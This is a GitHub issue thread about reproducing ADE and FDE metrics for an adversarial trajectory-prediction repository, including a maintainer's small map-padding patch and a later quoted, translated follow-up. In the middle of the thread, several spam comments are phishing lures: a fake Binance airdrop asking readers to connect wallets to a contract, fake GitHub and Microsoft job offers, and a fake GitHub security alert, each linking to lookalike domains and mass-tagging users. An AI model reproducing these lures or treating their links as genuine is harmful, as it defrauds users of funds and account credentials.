### ISSUE TITLE
Question about the ADE and FDE metrics

### ISSUE THREAD

**Issue by juyangbai** [zqzqz/AdvTrajectoryPrediction#3]
Hi Qingzhao, thank you for releasing the code with us! 

After following the steps on the readme file, I tested the normal trajectron_map model on nuScenes dataset with single_frame mode. The ADE and FDE I calculated are 7.131660 and 17.831819, but the results on paper are 2.69 and 5.39. I'm wondering if I miss some important steps to reproduce the result or if I need to modify anything locally? 

Thanks!

**Comment by juyangbai** [comment]
**FYI**

For the first step, I not only downloaded the provided formulated test cases from Google Drive but also followed the steps to generate test cases, because you mentioned that for the trajectron_map model we need map data.
![image](https://user-images.githubusercontent.com/80396058/180930414-6f39390b-7713-4423-9451-8112fc7f4aee.png)
![image](https://user-images.githubusercontent.com/80396058/180931089-99b2e43a-5947-4c28-9317-00304ff7a2e7.png)


For the second step, I downloaded the pre-trained models from Google Drive and unzipped them into directory test/data.
![image](https://user-images.githubusercontent.com/80396058/180932383-2f9ef530-61eb-4c62-9463-e52f7e78d0a0.png)
The contents in trajectron_map_nuscenes/model/original:
![image](https://user-images.githubusercontent.com/80396058/180932426-4299ff39-5eb3-4cad-b437-8b331f0ba938.png)


After preparing the datasets and models, I run the command:
`python test.py --dataset nuscenes --model trajectron_map --mode single_frame`

**Comment by zqzqz** [comment]
Hi @juyangbai, the ADE (7.13) and FDE (17.83) is the error in l2 distance, which is in meter^2. The smaller numbers 2.69 and 5.39 are actually squared roots of ADE and FDE (i.e., sqrt(ADE) and sqrt(FDE)), which is in meters.  I think the numbers you got are as expected.

**Comment by juyangbai** [comment]
Hi @zqzqz, thank you for your reply! Actually, I rewrote the evaluation function to calculate the error in meters, and modified the test_core function, as the figures showed below. The results using the original evaluation function would reach around one hundred, which should be the I2 distance you mentioned.

![image](https://user-images.githubusercontent.com/80396058/182285599-5cfd53df-e24f-440e-ac12-b248cd9e98f0.PNG)
![image](https://user-images.githubusercontent.com/80396058/182285606-09bf27eb-460e-4315-adfd-bd5bd3fa4780.png)

**Comment by zqzqz** [comment]
Hi @juyangbai, I double confirmed that I can use the formulated test data to reproduce the ADE/FDE number. Your code looks good to me though. I would guess the problem is the test data.

I have a few suggestions to debug this issue:

1. You can take a look at the visualized trajectories (which should be generated in the data directory already) to confirm if the results are reasonable.
2. Do not run data generation (i.e., `preprocessing.py` in `data/nuscenes`). I have uploaded the `map_name.txt` to `data/nuscenes` to address the map issue. Just use the original `map_name.txt` instead of generating a new one.
3. Make sure the version of nuScenes is the same (v1.0).

We can discuss your findings later.

**Comment by juyangbai** [comment]
Hi @zqzqz, thank you for taking the time to debug with me! I tried all of your suggestions those days.

1. I checked the visualized trajectories, and those figures are not reasonable, which verify the calculation of ADE and FDE should be right. Take the first sample as an example:
![image](https://user-images.githubusercontent.com/80396058/182974538-c5429db6-b0bb-4257-a215-8930eb4fb6c8.png)
2. I replaced the generated `map_name.txt` with the one you provided. But the results are still the same: ADE (7.13) and FDE (17.83). 
3. I used the `nuScenes Mini Dataset (V1.0)` + `Map expansion pack (V1.1)` following the instruction of [Trajecton++](https://github.com/StanfordASL/Trajectron-plus-plus). Also, I tried the `nuScenes Mini Dataset (V1.0)` + the `Map expansion pack (V1.0)`. However, the results are still the same. Are you using the full dataset other than the mini dataset?

I would like to share part of the report.log from the Trajectron++ model. It seems the problem might be the map files.
![image](https://user-images.githubusercontent.com/80396058/182976209-5c61ce86-6718-470d-9a02-c99dfa9334f7.png)

I also tested the GRIP++ model on the Apolloscape dataset, and could successfully reproduce the ADE and FDE results. So I think the whole environment setup should be right.

**Comment by zqzqz** [comment]
@juyangbai Thank you a lot. I see the problem now. 

First, I used the full nuScenes dataset along with the map all in v1.0.

Second, according to your error report, I added a patch in code of [Trajectron++ map.py](https://github.com/StanfordASL/Trajectron-plus-plus/blob/master/trajectron/environment/map.py#L119). On line 119, add the following (pardon my ugly code).

```python
        for i in range(centers.shape[0]):
            if centers[i, 0] - context_padding_x < 0:
                centers[i, 0] = context_padding_x
            if centers[i, 0] + context_padding_x > padded_map[i].shape[1]:
                centers[i, 0] = padded_map[i].shape[1] - context_padding_x
            if centers[i, 1] - context_padding_y < 0:
                centers[i, 1] = context_padding_y
            if centers[i, 1] + context_padding_y > padded_map[i].shape[2]:
                centers[i, 1] = padded_map[i].shape[2] - context_padding_y
```

Basically, when Trajectron++ fetches the map, sometimes it reaches the border of the map thus the map size mismatches. You can try again after adding this patch and see if the ADE/FDE drops. I will try to figure out this issue and update my README.

**Comment by juyangbai** [comment]
Thank you for providing the code for me! 

1. I'll try to add this patch in `map.py` to see if I can solve the problem.
2. For the full nuScenes dataset, did you use all of them? They separate the full nuScenes dataset into ten parts, each part of the dataset has the data from different sensors, such as Lidar, Radar, and Camera. Which one are you using? (Downloading all of them is a huge pain :joy:)

**Comment by juyangbai** [comment]
Hi @zqzqz, thank you for providing the code for me! 

1. I tried to add this patch in `map.py`, and used the map V1.0 to test. Unfortunately, the results of ADE and FDE didn't drop.
2. For the version of the nuScenes dataset, I downloaded the formulated test cases from [Google Drive](https://drive.google.com/file/d/1WxFotCnTC6oSqFTtc7PAkBHM6CNrTZJ4/view), so I think it shouldn't be a problem. I'm wondering if you are using the same formulated test cases from Google Drive.

Do you have any other suggestions to solve this problem? Thanks!

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by deepak7774** [comment]
[![Celestia Banner](https://cdn-learn.adafruit.com/assets/assets/000/112/622/medium800/programming_GitHub_logo_with_mark.png?1656187481g)](http://jobs.githubtalentcommunity.online/auth)

Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
LZDOscar, @qwrdxer, @fly-dust, @bursonz, @mwina, @fei-chang, @A1yosa, @zjuujz8021, @arcAman07, @jfdousdu, @wxy325, @rainy2k, @Kataang, @chichidd, @liuxiaoqian0724, @wangtsiao, @unravel11, @HuKaiLang, @luodeyu, @HTMLgtMK

**Comment by wsdevprogrammer** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
someshc8i, @bohendo, @luanpontolio, @ivanvpan, @yurycooliq, @rheaplex, @colorgirl4, @Nangelov7, @ukexim13, @metalheadani, @ayush-3516, @nonogakhi, @jeanregisser, @Lobok7, @1500256797, @bout3fiddy, @AgusVelez5, @mehmethafif, @gsscoder, @0xM3R

**Comment by akashakki** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
vasemkin, @targeral, @w1397800, @0xkzam, @philosophercode, @rccoder, @alexkubica, @cyborgRen, @bpierre, @Hugo-Vincent, @xe54ck, @developerasun, @grayashh, @jonbaer, @foghill, @RomansWorks, @wanglingsong, @alireza-gsh, @martin820303, @borisovdev

**Comment by demmorou** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
xiandibo, @Shuo93, @qhyw99, @yuanjianwen1994, @dongjl123, @kinnisoy, @b04901140, @UIZorrot, @lishengxie, @Chenxinjie65, @Xinchungeorb, @lalalashenle, @Z-Zhijie, @jungbeomseo, @ik5, @Tri-stone, @N1ghtu, @cx18810901539, @depressi0n, @litrane

**Comment by chengqb0126** [comment]
> Hi Qingzhao, thank you for releasing the code with us!嗨，清照，谢谢你和我们一起发布代码！
> 
> After following the steps on the readme file, I tested the normal trajectron_map model on nuScenes dataset with single_frame mode. The ADE and FDE I calculated are 7.131660 and 17.831819, but the results on paper are 2.69 and 5.39. I'm wondering if I miss some important steps to reproduce the result or if I need to modify anything locally?按照自述文件中的步骤操作后，我使用single_frame模式在nuScenes数据集上测试了正常的martron_map模型。计算的ADE和FDE I分别为7.131660和17.831819，而文献上的结果分别为2.69和5.39。我想知道我是否错过了一些重要的步骤来重现结果，或者我是否需要在本地修改任何东西？
> 
> Thanks! 谢谢你，谢谢



> Hi @zqzqz, thank you for taking the time to debug with me! I tried all of your suggestions those days.您好，感谢您抽出时间与我一起调试！我试过你所有的建议。
> 
> 1. I checked the visualized trajectories, and those figures are not reasonable, which verify the calculation of ADE and FDE should be right. Take the first sample as an example:我检查了可视化的轨迹，那些数字是不合理的，这验证了ADE和FDE的计算应该是正确的。以第一个示例为例：
>    ![image](https://user-images.githubusercontent.com/80396058/182974538-c5429db6-b0bb-4257-a215-8930eb4fb6c8.png)
> 2. I replaced the generated `map_name.txt` with the one you provided. But the results are still the same: ADE (7.13) and FDE (17.83).我把生成的 `map_name.txt` 替换成了你提供的。但结果仍然相同：ADE（7.13）和FDE（17.83）。
> 3. I used the `nuScenes Mini Dataset (V1.0)` + `Map expansion pack (V1.1)` following the instruction of [Trajecton++](https://github.com/StanfordASL/Trajectron-plus-plus). Also, I tried the `nuScenes Mini Dataset (V1.0)` + the `Map expansion pack (V1.0)`. However, the results are still the same. Are you using the full dataset other than the mini dataset?我按照Trajecton++的说明使用了 `nuScenes Mini Dataset (V1.0)` + `Map expansion pack (V1.1)` 。我也试了 `nuScenes Mini Dataset (V1.0)` + `Map expansion pack (V1.0)` 。然而，结果还是一样。您是否使用完整数据集而不是迷你数据集？
> 
> I would like to share part of the report.log from the Trajectron++ model. It seems the problem might be the map files.我想分享Trajectron++模型的report.log的一部分。似乎地图文件有问题。 ![image](https://user-images.githubusercontent.com/80396058/182976209-5c61ce86-6718-470d-9a02-c99dfa9334f7.png)
> 
> I also tested the GRIP++ model on the Apolloscape dataset, and could successfully reproduce the ADE and FDE results. So I think the whole environment setup should be right.我还在Apolloscape数据集上测试了GRIP++模型，并成功地重现了ADE和FDE结果。所以我认为整个环境设置应该是正确的。

兄弟，在Apolloscape数据集上测试GRIP++模型，你跑了多久啊。我跑了几个小时没结素
